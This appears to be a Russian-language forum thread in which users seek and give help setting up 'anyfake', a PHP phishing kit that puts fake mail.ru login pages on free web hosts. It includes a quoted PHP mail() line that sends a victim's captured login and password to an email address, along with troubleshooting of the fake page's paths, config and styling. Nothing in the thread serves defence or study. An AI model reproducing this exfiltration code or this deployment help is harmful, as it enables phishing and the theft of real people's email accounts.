Дальше если фтп соответствует всем требованиям , в файле aNYfAKE.php появится ложная страница авторизации
и что с етой ложной страницей авторизацией делать??? кстати перешел на нее а он мне пишет Unable to connect to mail.ru есть какие варианты обхода етого, или это озночает то что настройки программы неправильны!???
Как на данный момент можно сделать fake для mail.ru ? Возможно ли в принципе с помощью anyfake? (хост 110mb.com)
Кто подскажет почему на этом сервере 000webhost.com не присылает ответ $ mail("[email protected]","Disk","4el $Login Pas: $Password " ); Присылает ответ: 4еl Pas A ответа переменных нет Ps. Пробывал на локальном сервере всё работает с ответом
Друзья, помогите с настройкой - выложил все на хостинг свой, зашел на страницу, что именно надо вписать в поля Fake path: и Fake script: А то что бы я ни вписывал, самое путное что получается - страница мэйла с ошибкой "Данная страница не найдена на нашем сервере. ".. Заранее благодарю..
Отличный скрипт, тока долго мучался с настройкой и даже сам не понял как всё-таки всё получилось Пасыба автору)
у меня проблема в одном, не загружается ксс и ещё вопрос, возможно ли сделать что бы сохранялся весь фейк куда нить
а как его запустить ? anyfake.php открываю через браузер там какие то иероглифы )) и в конфиге что либо надо прописывать ?